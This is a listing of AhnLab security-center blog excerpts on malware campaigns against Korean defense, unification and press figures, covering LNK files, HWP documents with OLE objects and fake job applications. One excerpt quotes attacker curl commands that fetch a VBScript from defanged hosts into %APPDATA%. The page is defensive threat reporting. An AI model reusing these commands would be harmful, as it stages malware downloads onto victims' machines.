Warning Against Distribution of Malware Impersonating a Public Organization (LNK) Posted By yeeun , November 15, 2023 AhnLab Security Emergency response Center (ASEC) observed the distribution of malicious shortcut (*.lnk) files impersonating a public organization. The threat actor seems to be distributing a malicious script (HTML) file disguised as a security email by attaching it to emails. These usually target individuals in the field of Korean reunification and national security. Notably, these were disguised with topics of honorarium payment to make them seem like legitimate documents. The malware’s operation method and C2 format are similar to those…
Warning Against HWP Documents Embedded with Malicious OLE Objects Posted By yeeun , November 1, 2023 AhnLab Security Emergency response Center (ASEC) found HWP documents that were embedded with OLE objects, targeting individuals in specific sectors such as the national defense and the press. The malware is presumed to be distributed mainly through download URLs or attachments in emails. The file names of the distributed documents are relevant to the areas of national defense, unification, education, and broadcasting, suggesting that the malware targets professionals involved in these areas. The HWP documents analyzed in this post largely…
Malware Being Distributed Disguised as a Job Application Letter Posted By AhnLab_en , June 8, 2023 AhnLab Security Emergency response Center (ASEC) has identified that malware disguised as a job application letter is continuously being distributed. This malware is equipped with a feature that checks for the presence of various antivirus processes including a process with AhnLab’s product name (V3Lite.exe) and is being distributed through malicious URLs designed to resemble a Korean job-seeking website. Below are the discovered download URLs. The malicious file downloaded from the above URLs has a screen saver file extension (.scr) and an…
Malicious HWP File Disguised as a Happy Birthday Message (OLE Object) Posted By jcleebobgatenet , September 1, 2022 The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of malware is yet to be determined, but the VBScript is downloaded through curl. The commands discovered so far are as follows: curl -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp Both commands save scripts in the %APPDATA% folder as vbtemp. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript codes that perform features such as registering to task…
Malicious HWP Files with BAT Scripts Being Distributed Actively (North Korea/National Defense/Broadcasting) Posted By jcleebobgatenet , June 17, 2022 The ASEC analysis team has discovered the active distribution of APT files that are exploiting a feature of HWP files (OLE object insertion) recently. After the case introduced in the post “Malicious HWP File Disguised as Press Release of 20th Presidential Election Early Voting for Sailors Being Distributed” on March 8th, the attacker is continuously distributing malicious HWP files targeting people in the field of national defense, North Korea-related materials, and broadcasting. When the file is opened, the OLE object…
